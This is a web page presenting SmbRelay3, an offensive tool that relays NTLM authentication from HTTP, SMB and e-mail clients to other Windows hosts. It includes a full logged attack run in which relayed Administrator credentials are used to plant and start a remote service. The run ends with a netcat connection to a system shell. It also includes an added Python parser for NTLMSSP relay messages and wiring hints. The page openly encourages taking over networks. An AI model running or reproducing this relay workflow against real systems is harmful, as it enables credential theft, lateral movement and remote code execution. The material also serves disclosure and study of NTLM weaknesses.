Introduction
Most Windows networks still support insecure authentication schemes by default.
NTLM is one example: it is enabled by default on every Windows release up to and
including the latest, Windows Vista.
NTLM lets whoever receives an incoming connection relay it to a third-party system
and authenticate there as the connecting user, without ever knowing the password.
Therefore, connecting to a system with NTLM means that you can be owned.
This authentication scheme is used by a variety of protocols, such as HTTP. There is
also a Windows feature that lets the web browser (iexplore) or the system itself
(explorer) automatically send the user's credentials to a network server whenever
that server requires authentication.
If you are able to force remote users to connect to your system (over HTTP or SMB)
by DNS attacks (poisoning, ...), social engineering, an e-mail link, an MSN HTTP link,
XSS, shutting down a valid server and taking over its IP address, or deploying some
kind of malicious payload, then in theory the network belongs to you. To exploit
these security flaws we have developed a new security tool named SmbRelay 3, which
at this time is able to relay both HTTP and SMB authentication.
Smbrelay3 is the first public tool that allows these kinds of attacks. This
version also includes a small SMB library for creating crafted messages, so if
the incoming connection has administrative privileges on the computer the
credentials are relayed to, you will automatically get a shell.

Currently the following attacks are implemented:
* HTTP to SMB: Negotiate authentication with an HTTP client and relay the credentials
to another SMB host.
* SMB to SMB: Negotiate authentication with an SMB client and relay the credentials
to another Windows computer.
* IMAP to SMB: Negotiate authentication with an IMAP e-mail client and relay the
credentials to another host.
* POP3 to SMB: Negotiate authentication with a POP3 e-mail client and relay the
credentials to another host.
* SMTP to SMB: Negotiate authentication with an SMTP e-mail client and relay the
credentials to another SMB host.
* Psexec module: If you already know the username and password, you can get a
shell on the remote computer. This psexec-like tool works under Win32 and Linux
because it does not use the Microsoft API.
* Fake interface: Under Linux, port 445 is bound on a second IP address. All
packets sent to that interface are relayed to the previously authenticated system.
Details
If the gathered credentials have administrative privileges on the target system,
in those scenarios you will automatically get a remote shell on the target system.
There are also two additional features, the Psexec module and the fake interface
listed above.
To give the user that remote shell automatically, smbrelay needs to send raw SMB
messages to the SMB server. That is why smbrelay3 implements its own SMB library
for creating specially crafted packets.

Smbrelay is able to send the following SMB requests (the values are the command
codes from the SMB header; the corresponding SMB_COM_* names are given as comments):
#define SMBCLOSE 0x04           /* SMB_COM_CLOSE */
#define SERVICEOPERATION 0x25   /* SMB_COM_TRANSACTION: named pipe / RPC traffic */
#define READANDX 0x2e           /* SMB_COM_READ_ANDX */
#define WRITEANDX 0x2f          /* SMB_COM_WRITE_ANDX */
#define FINDFIRST2 0x32         /* SMB_COM_TRANSACTION2 (TRANS2_FIND_FIRST2 subcommand) */
#define SESSIONSETUPANDX 0x73   /* SMB_COM_SESSION_SETUP_ANDX */
#define TREECONNECTANDX 0x75    /* SMB_COM_TREE_CONNECT_ANDX */
#define NTCREATEANDX 0xa2       /* SMB_COM_NT_CREATE_ANDX */
For more information, read the README file.
Attack Example:
C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81
SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - [email protected]
Website: http://www.tarasco.org
Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080
C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
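The exchange logged above can be followed with the Python below, an added example that is not part of SmbRelay3 or its source. It decodes the NTLMSSP messages a relay shuttles between the two sides (the type 2 challenge coming back from the SMB server and the type 3 response from the HTTP client) and shows where the tool's "NTLM v2", UserName, DomainName and WorkstationName log lines are read from. The point worth noticing is that the relay computes nothing: the type 3 message is forwarded byte for byte. The sample messages, the target name SERVER, the dummy NTLMv2 response and the build_challenge/build_authenticate/walkthrough helpers are this example's own constructions, not the tool's API or captured traffic.

```python
"""NTLMSSP message parser for a relay (added example; not SmbRelay3 source).
A relay never computes NTLM responses: it forwards the client's NEGOTIATE (type 1)
and AUTHENTICATE (type 3) to the target SMB server and the server's CHALLENGE
(type 2) back to the client. It only needs to *read* them, e.g. to log who is
being relayed and which NTLM version was used. Sample messages below are
constructed here, not captured from a real host."""
import base64
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001      # string fields are UTF-16LE (else OEM/ASCII)
NEGOTIATE_TARGET_INFO = 0x00800000
TARGET_TYPE_SERVER = 0x00020000


def _field(buf, off):
    """Resolve an 8-byte (Len, MaxLen, Offset) descriptor to its payload bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return bytes(buf[offset:offset + length])


def _text(raw, flags):
    return raw.decode("utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii")


def parse_ntlm(msg):
    """Decode a type 1, 2 or 3 NTLMSSP message (field offsets per MS-NLMP)."""
    if msg[:8] != SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    mtype = struct.unpack_from("<I", msg, 8)[0]
    if mtype == 1:        # NEGOTIATE: victim client -> relay -> server
        return {"type": 1, "flags": struct.unpack_from("<I", msg, 12)[0]}
    if mtype == 2:        # CHALLENGE: server -> relay -> client
        flags = struct.unpack_from("<I", msg, 20)[0]
        return {"type": 2, "flags": flags,
                "target": _text(_field(msg, 12), flags),
                "challenge": bytes(msg[24:32])}
    if mtype == 3:        # AUTHENTICATE: client's answer -> relay -> server
        flags = struct.unpack_from("<I", msg, 60)[0]
        nt_resp = _field(msg, 20)
        return {"type": 3, "flags": flags,
                "domain": _text(_field(msg, 28), flags),
                "user": _text(_field(msg, 36), flags),
                "workstation": _text(_field(msg, 44), flags),
                # 24-byte NTChallengeResponse = NTLMv1; NTLMv2 appends a client blob
                "ntlm_version": 1 if len(nt_resp) == 24 else 2}
    raise ValueError("unknown NTLMSSP message type %d" % mtype)


def http_to_ntlm(authorization):
    """'NTLM <base64>' header value (Authorization / WWW-Authenticate) -> raw bytes."""
    scheme, _, token = authorization.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("not NTLM authentication")
    return base64.b64decode(token)


def ntlm_to_http(msg):
    """Raw NTLMSSP bytes -> 'NTLM <base64>' header value for the HTTP side."""
    return "NTLM " + base64.b64encode(msg).decode("ascii")


# Builders used only to construct the sample messages for the walk-through.
def build_challenge(server_challenge, target, flags):
    name = target.encode("utf-16-le")
    info = b"\x00\x00\x00\x00"                  # AV_PAIR list holding only MsvAvEOL
    hdr = SIGNATURE + struct.pack("<I", 2)
    hdr += struct.pack("<HHI", len(name), len(name), 56)
    hdr += struct.pack("<I", flags) + server_challenge + b"\x00" * 8
    hdr += struct.pack("<HHI", len(info), len(info), 56 + len(name))
    return hdr + b"\x00" * 8 + name + info      # zeroed Version field, then payload


def build_authenticate(user, domain, workstation, lm_resp, nt_resp, flags):
    parts = [lm_resp, nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"),
             workstation.encode("utf-16-le"), b""]  # last: EncryptedRandomSessionKey
    descs, payload, off = b"", b"", 88          # fixed part incl. Version (8) + MIC (16)
    for p in parts:
        descs += struct.pack("<HHI", len(p), len(p), off)
        payload, off = payload + p, off + len(p)
    return (SIGNATURE + struct.pack("<I", 3) + descs + struct.pack("<I", flags)
            + b"\x00" * 24 + payload)


def walkthrough():
    """The hops of the HTTP-to-SMB run above, replayed on constructed messages."""
    flags = NEGOTIATE_UNICODE | NEGOTIATE_TARGET_INFO | TARGET_TYPE_SERVER
    # SMB server answers our SessionSetupAndX with its CHALLENGE ...
    type2 = build_challenge(b"\x01\x23\x45\x67\x89\xab\xcd\xef", "SERVER", flags)
    www_auth = ntlm_to_http(type2)              # ... which we hand to the HTTP client
    # client answers with a dummy (not computed) NTLMv2 response: 16-byte NTProofStr + blob
    nt_resp = b"\xaa" * 16 + b"\x01\x01\x00\x00" + b"\x00" * 28
    type3 = build_authenticate("Administrator", "192.168.1.36", "SERVIDOR",
                               b"\x00" * 24, nt_resp, NEGOTIATE_UNICODE)
    forwarded = http_to_ntlm(ntlm_to_http(type3))   # forwarded to SMB byte-for-byte
    return parse_ntlm(type2), parse_ntlm(forwarded), forwarded == type3, www_auth
```

Wiring this to real sockets means putting the type 1 and type 3 bytes from the HTTP Authorization header into the security blob of a SessionSetupAndX request, and the blob from the server's SessionSetupAndX response into the 401's WWW-Authenticate header; the parser only reads the messages that pass through, which is all a relay has to do.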
Special thanks go to Iñaki Lopez for developing the NTLM library.
Update: A few months after we delivered a copy of smbrelay3 to Microsoft MSRC,
they released the MS08-068 security bulletin, which prevents this vulnerability
from being exploited against the same workstation under the same protocol. Since
only the reflection attack is fixed, you can still relay credentials to other
domain servers or across different protocols. Enjoy :)
* Download (Windows executable + Source code)
* Browse source code online
* Paper: Download the Spanish paper (presented at the Lac0n security congress) with
detailed information about how NTLM works and how to exploit Windows authentication